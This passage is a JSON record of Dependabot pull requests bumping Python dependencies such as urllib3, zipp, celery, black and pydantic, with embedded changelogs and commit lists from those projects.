href=\"https://redirect.github.com/urllib3/urllib3/issues/3\"\u003e#3\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9996e0fbf90b77083ad3c73737a6c6395703faa9\"\u003e\u003ccode\u003e9996e0f\u003c/code\u003e\u003c/a\u003e Fix emscripten CI for Chrome 137+ (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3599\"\u003e#3599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/4fd1a99a59725faf0efc946ce3b6bc9a194420af\"\u003e\u003ccode\u003e4fd1a99\u003c/code\u003e\u003c/a\u003e Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3617\"\u003e#3617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c4b5917e911a90c8bf279448df8952a682294135\"\u003e\u003ccode\u003ec4b5917\u003c/code\u003e\u003c/a\u003e Add support for the new \u003ccode\u003ecompression.zstd\u003c/code\u003e module in Python 3.14 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3611\"\u003e#3611\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.5...2.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `zipp` from 3.3.0 to 3.19.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jaraco/zipp/blob/main/NEWS.rst\"\u003ezipp's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003ev3.19.1\u003c/h1\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved handling of malformed zip files. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/119\"\u003e#119\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev3.19.0\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement is_symlink. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/117\"\u003e#117\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev3.18.2\u003c/h1\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003ch1\u003ev3.18.1\u003c/h1\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003ch1\u003ev3.18.0\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBypass ZipFile.namelist in glob for better performance. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/106\"\u003e#106\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRefactored glob functionality to support a more generalized solution with support for platform-specific path separators. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/108\"\u003e#108\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd special accounting for pypy when computing the stack level for text encoding warnings. (\u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/114\"\u003e#114\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003ev3.17.0\u003c/h1\u003e\n\u003cp\u003eFeatures\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/6d1cb72aa55e0536f35d2af128994b5a61ca4c1a\"\u003e\u003ccode\u003e6d1cb72\u003c/code\u003e\u003c/a\u003e Finalize\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/fd604bd34f0343472521a36da1fbd22e793e14fd\"\u003e\u003ccode\u003efd604bd\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/120\"\u003e#120\u003c/a\u003e from jaraco/bugfix/119-malformed-paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/c18417ed2953e181728a7dac07bff88a2190abf7\"\u003e\u003ccode\u003ec18417e\u003c/code\u003e\u003c/a\u003e Add news fragment.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/58115d2be968644ce71ce6bcc9b79826c82a1806\"\u003e\u003ccode\u003e58115d2\u003c/code\u003e\u003c/a\u003e Employ SanitizedNames in CompleteDirs. Fixes broken test.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/564fcc10cdbfdaecdb33688e149827465931c9e0\"\u003e\u003ccode\u003e564fcc1\u003c/code\u003e\u003c/a\u003e Add SanitizedNames mixin.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/79a309fe54dc6b7934fb72e9f31bcb58f2e9f547\"\u003e\u003ccode\u003e79a309f\u003c/code\u003e\u003c/a\u003e Add some assertions about malformed paths.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/2d015c22348fab46ca765339f55f84fe9d6e8115\"\u003e\u003ccode\u003e2d015c2\u003c/code\u003e\u003c/a\u003e Merge \u003ca href=\"https://github.com/jaraco/skeleton\"\u003ehttps://github.com/jaraco/skeleton\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/a595a0fad054cd20b69d3e954c99174e3a548938\"\u003e\u003ccode\u003ea595a0f\u003c/code\u003e\u003c/a\u003e Rename extras to align with core metadata spec.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/608f90a6e74919501577a1312dc5c7d8e1d391d7\"\u003e\u003ccode\u003e608f90a\u003c/code\u003e\u003c/a\u003e Finalize\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaraco/zipp/commit/3a22d724acf874111b43f87f7110225122ec3de5\"\u003e\u003ccode\u003e3a22d72\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/jaraco/zipp/issues/118\"\u003e#118\u003c/a\u003e from jaraco/feature/is-symlink\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/jaraco/zipp/compare/v3.3.0...v3.19.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `celery` from 4.1.0 to 5.5.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/releases\"\u003ecelery's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.5.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003emake the tests run on python 3.13 for gcs backend by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9677\"\u003ecelery/celery#9677\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded DeepWiki to README by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9683\"\u003ecelery/celery#9683\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLimit redis to \u0026lt;=v5.2.1 to match Kombu by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9693\"\u003ecelery/celery#9693\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse EX_OK instead of literal zero by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9684\"\u003ecelery/celery#9684\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake wheel metadata reproducible by \u003ca href=\"https://github.com/cjwatson\"\u003e\u003ccode\u003e@​cjwatson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9687\"\u003ecelery/celery#9687\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003elet celery install from kombu dependencies for better align by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9696\"\u003ecelery/celery#9696\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix stamping documentation to clarify stamped_headers key is optional in visitor methods by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9697\"\u003ecelery/celery#9697\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport apply_async without queue argument on quorum queues by \u003ca href=\"https://github.com/bityob\"\u003e\u003ccode\u003e@​bityob\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9686\"\u003ecelery/celery#9686\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdated rabbitmq doc about using quorum queues with task routes by \u003ca href=\"https://github.com/bityob\"\u003e\u003ccode\u003e@​bityob\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9707\"\u003ecelery/celery#9707\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd: Dumper Unit Test by \u003ca href=\"https://github.com/yiyu0x\"\u003e\u003ccode\u003e@​yiyu0x\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9711\"\u003ecelery/celery#9711\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd unit test for event.group_from by \u003ca href=\"https://github.com/rogerforlife\"\u003e\u003ccode\u003e@​rogerforlife\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9709\"\u003ecelery/celery#9709\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: add beat_cron_starting_deadline documentation warning by \u003ca href=\"https://github.com/alirafiei75\"\u003e\u003ccode\u003e@​alirafiei75\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9712\"\u003ecelery/celery#9712\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: resolve issue \u003ca href=\"https://redirect.github.com/celery/celery/issues/9569\"\u003e#9569\u003c/a\u003e by supporting distinct broker transport options for workers by \u003ca href=\"https://github.com/yiyu0x\"\u003e\u003ccode\u003e@​yiyu0x\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9695\"\u003ecelery/celery#9695\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFixes issue with retry callback arguments in DelayedDelivery by \u003ca href=\"https://github.com/maccinza\"\u003e\u003ccode\u003e@​maccinza\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9708\"\u003ecelery/celery#9708\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eget_exchange-unit-test by \u003ca href=\"https://github.com/rogerforlife\"\u003e\u003ccode\u003e@​rogerforlife\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9710\"\u003ecelery/celery#9710\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eISSUE-9704: Update documentation of result_expires, filesystem backend is supported by \u003ca href=\"https://github.com/MattiasDC\"\u003e\u003ccode\u003e@​MattiasDC\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9716\"\u003ecelery/celery#9716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupdate to blacksmith ubuntu 24.04 by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9717\"\u003ecelery/celery#9717\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded unit tests for celery.utils.iso8601 by \u003ca href=\"https://github.com/jaiganeshs21\"\u003e\u003ccode\u003e@​jaiganeshs21\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9725\"\u003ecelery/celery#9725\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate introduction.rst docs by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9728\"\u003ecelery/celery#9728\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare for release: v5.5.3 by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9732\"\u003ecelery/celery#9732\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bityob\"\u003e\u003ccode\u003e@​bityob\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9686\"\u003ecelery/celery#9686\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yiyu0x\"\u003e\u003ccode\u003e@​yiyu0x\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9711\"\u003ecelery/celery#9711\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rogerforlife\"\u003e\u003ccode\u003e@​rogerforlife\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9709\"\u003ecelery/celery#9709\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/alirafiei75\"\u003e\u003ccode\u003e@​alirafiei75\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9712\"\u003ecelery/celery#9712\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/maccinza\"\u003e\u003ccode\u003e@​maccinza\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9708\"\u003ecelery/celery#9708\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MattiasDC\"\u003e\u003ccode\u003e@​MattiasDC\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9716\"\u003ecelery/celery#9716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaiganeshs21\"\u003e\u003ccode\u003e@​jaiganeshs21\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9725\"\u003ecelery/celery#9725\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/celery/celery/compare/v5.5.2...v5.5.3\"\u003ehttps://github.com/celery/celery/compare/v5.5.2...v5.5.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.5.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix calculating remaining time across DST changes by \u003ca href=\"https://github.com/imrivera\"\u003e\u003ccode\u003e@​imrivera\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9669\"\u003ecelery/celery#9669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003esetup_logger\u003c/code\u003e from COMPAT_MODULES by \u003ca href=\"https://github.com/rconradharris\"\u003e\u003ccode\u003e@​rconradharris\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9668\"\u003ecelery/celery#9668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mongodb bullet and fix github links in contributions section by \u003ca href=\"https://github.com/jabberwock404\"\u003e\u003ccode\u003e@​jabberwock404\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9672\"\u003ecelery/celery#9672\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare for release: v5.5.2 by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9675\"\u003ecelery/celery#9675\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/imrivera\"\u003e\u003ccode\u003e@​imrivera\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9669\"\u003ecelery/celery#9669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rconradharris\"\u003e\u003ccode\u003e@​rconradharris\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9668\"\u003ecelery/celery#9668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jabberwock404\"\u003e\u003ccode\u003e@​jabberwock404\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9672\"\u003ecelery/celery#9672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/celery/celery/compare/v5.5.1...v5.5.2\"\u003ehttps://github.com/celery/celery/compare/v5.5.1...v5.5.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.5.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/blob/main/Changelog.rst\"\u003ecelery's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e5.5.3\u003c/h1\u003e\n\u003cp\u003e:release-date: 2025-06-01\n:release-by: Tomer Nosrati\u003c/p\u003e\n\u003cp\u003eWhat's Changed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- make the tests run on python 3.13 for gcs backend ([#9677](https://github.com/celery/celery/issues/9677))\n- Added DeepWiki to README ([#9683](https://github.com/celery/celery/issues/9683))\n- Limit redis to \u0026lt;=v5.2.1 to match Kombu ([#9693](https://github.com/celery/celery/issues/9693))\n- Use EX_OK instead of literal zero ([#9684](https://github.com/celery/celery/issues/9684))\n- Make wheel metadata reproducible ([#9687](https://github.com/celery/celery/issues/9687))\n- let celery install from kombu dependencies for better align ([#9696](https://github.com/celery/celery/issues/9696))\n- Fix stamping documentation to clarify stamped_headers key is optional in visitor methods ([#9697](https://github.com/celery/celery/issues/9697))\n- Support apply_async without queue argument on quorum queues ([#9686](https://github.com/celery/celery/issues/9686))\n- Updated rabbitmq doc about using quorum queues with task routes ([#9707](https://github.com/celery/celery/issues/9707))\n- Add: Dumper Unit Test ([#9711](https://github.com/celery/celery/issues/9711))\n- Add unit test for event.group_from ([#9709](https://github.com/celery/celery/issues/9709))\n- refactor: add beat_cron_starting_deadline documentation warning ([#9712](https://github.com/celery/celery/issues/9712))\n- fix: resolve issue [#9569](https://github.com/celery/celery/issues/9569) by supporting distinct broker transport options for workers ([#9695](https://github.com/celery/celery/issues/9695))\n- Fixes issue with retry callback arguments in DelayedDelivery ([#9708](https://github.com/celery/celery/issues/9708))\n- get_exchange-unit-test ([#9710](https://github.com/celery/celery/issues/9710))\n- ISSUE-9704: Update documentation of result_expires, filesystem backend is supported ([#9716](https://github.com/celery/celery/issues/9716))\n- update to blacksmith ubuntu 24.04 ([#9717](https://github.com/celery/celery/issues/9717))\n- Added unit tests for celery.utils.iso8601 ([#9725](https://github.com/celery/celery/issues/9725))\n- Update introduction.rst docs ([#9728](https://gi...\n\n_Description has been truncated_","html_url":"https://github.com/Waka758/Hot-Food/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Waka758%2FHot-Food/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"},{"uuid":"2626504697","node_id":"PR_kwDOGSMLgc6cjUf5","number":94,"state":"closed","title":"build(deps): bump the pip group across 1 directory with 8 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":"2025-06-28T21:57:48.000Z","author_association":"NONE","state_reason":null,"created_at":"2025-06-28T21:55:36.000Z","updated_at":"2025-06-28T21:57:48.000Z","time_to_close":132,"merged_at":"2025-06-28T21:57:48.000Z","merged_by":"zxenonx","closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"pip","update_count":8,"packages":[{"name":"black","old_version":"24.3.0","new_version":"25.1.0","repository_url":"https://github.com/psf/black"},{"name":"certifi","old_version":"2024.7.4","new_version":"2025.6.15","repository_url":"https://github.com/certifi/python-certifi"},{"name":"httpx","old_version":"0.23.0","new_version":"0.28.1","repository_url":"https://github.com/encode/httpx"},{"name":"idna","old_version":"3.7","new_version":"3.10","repository_url":"https://github.com/kjd/idna"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"pydantic","old_version":"1.10.13","new_version":"2.11.7","repository_url":"https://github.com/pydantic/pydantic"},{"name":"starlette","old_version":"0.40.0","new_version":"0.47.1","repository_url":"https://github.com/encode/starlette"},{"name":"virtualenv","old_version":"20.26.6","new_version":"20.31.2","repository_url":"https://github.com/pypa/virtualenv"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 8 updates in the /backend directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [black](https://github.com/psf/black) | `24.3.0` | `25.1.0` |\n| [certifi](https://github.com/certifi/python-certifi) | `2024.7.4` | `2025.6.15` |\n| [httpx](https://github.com/encode/httpx) | `0.23.0` | `0.28.1` |\n| [idna](https://github.com/kjd/idna) | `3.7` | `3.10` |\n| [py](https://github.com/pytest-dev/py) | `1.10.0` | `1.11.0` |\n| [pydantic](https://github.com/pydantic/pydantic) | `1.10.13` | `2.11.7` |\n| [starlette](https://github.com/encode/starlette) | `0.40.0` | `0.47.1` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `20.26.6` | `20.31.2` |\n\n\nUpdates `black` from 24.3.0 to 25.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/black/releases\"\u003eblack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e25.1.0\u003c/h2\u003e\n\u003ch3\u003eHighlights\u003c/h3\u003e\n\u003cp\u003eThis release introduces the new 2025 stable style (\u003ca href=\"https://redirect.github.com/psf/black/issues/4558\"\u003e#4558\u003c/a\u003e), stabilizing\nthe following changes:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNormalize casing of Unicode escape characters in strings to lowercase (\u003ca href=\"https://redirect.github.com/psf/black/issues/2916\"\u003e#2916\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix inconsistencies in whether certain strings are detected as docstrings (\u003ca href=\"https://redirect.github.com/psf/black/issues/4095\"\u003e#4095\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConsistently add trailing commas to typed function parameters (\u003ca href=\"https://redirect.github.com/psf/black/issues/4164\"\u003e#4164\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove redundant parentheses in if guards for case blocks (\u003ca href=\"https://redirect.github.com/psf/black/issues/4214\"\u003e#4214\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd parentheses to if clauses in case blocks when the line is too long (\u003ca href=\"https://redirect.github.com/psf/black/issues/4269\"\u003e#4269\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eWhitespace before \u003ccode\u003e# fmt: skip\u003c/code\u003e comments is no longer normalized (\u003ca href=\"https://redirect.github.com/psf/black/issues/4146\"\u003e#4146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix line length computation for certain expressions that involve the power operator (\u003ca href=\"https://redirect.github.com/psf/black/issues/4154\"\u003e#4154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCheck if there is a newline before the terminating quotes of a docstring (\u003ca href=\"https://redirect.github.com/psf/black/issues/4185\"\u003e#4185\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix type annotation spacing between \u003ccode\u003e*\u003c/code\u003e and more complex type variable tuple (\u003ca href=\"https://redirect.github.com/psf/black/issues/4440\"\u003e#4440\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe following changes were not in any previous release:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRemove parentheses around sole list items (\u003ca href=\"https://redirect.github.com/psf/black/issues/4312\"\u003e#4312\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eGeneric function definitions are now formatted more elegantly: parameters are\nsplit over multiple lines first instead of type parameter definitions (\u003ca href=\"https://redirect.github.com/psf/black/issues/4553\"\u003e#4553\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eStable style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix formatting cells in IPython notebooks with magic methods and starting or trailing\nempty lines (\u003ca href=\"https://redirect.github.com/psf/black/issues/4484\"\u003e#4484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix crash when formatting \u003ccode\u003ewith\u003c/code\u003e statements containing tuple generators/unpacking\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4538\"\u003e#4538\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview style\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix/remove string merging changing f-string quotes on f-strings with internal quotes\n(\u003ca href=\"https://redirect.github.com/psf/black/issues/4498\"\u003e#4498\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCollapse multiple empty lines after an import into one (\u003ca href=\"https://redirect.github.com/psf/black/issues/4489\"\u003e#4489\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent \u003ccode\u003estring_processing\u003c/code\u003e and \u003ccode\u003ewrap_long_dict_values_in_parens\u003c/code\u003e from removing\nparentheses around long dictionary values (\u003ca href=\"https://redirect.github.com/psf/black/issues/4377\"\u003e#4377\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMove \u003ccode\u003ewrap_long_dict_values_in_parens\u003c/code\u003e from the unstable to preview style (\u003ca href=\"https://redirect.github.com/psf/black/issues/4561\"\u003e#4561\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePackaging\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eStore license identifier inside the \u003ccode\u003eLicense-Expression\u003c/code\u003e metadata field, see\n\u003ca href=\"https://peps.python.org/pep-0639/\"\u003ePEP 639\u003c/a\u003e. (\u003ca href=\"https://redirect.github.com/psf/black/issues/4479\"\u003e#4479\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up the \u003ccode\u003eis_fstring_start\u003c/code\u003e function in Black's tokenizer (\u003ca href=\"https://redirect.github.com/psf/black/issues/4541\"\u003e#4541\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eIntegrations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eIf using stdin with \u003ccode\u003e--stdin-filename\u003c/code\u003e set to a force excluded path, stdin won't be\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... 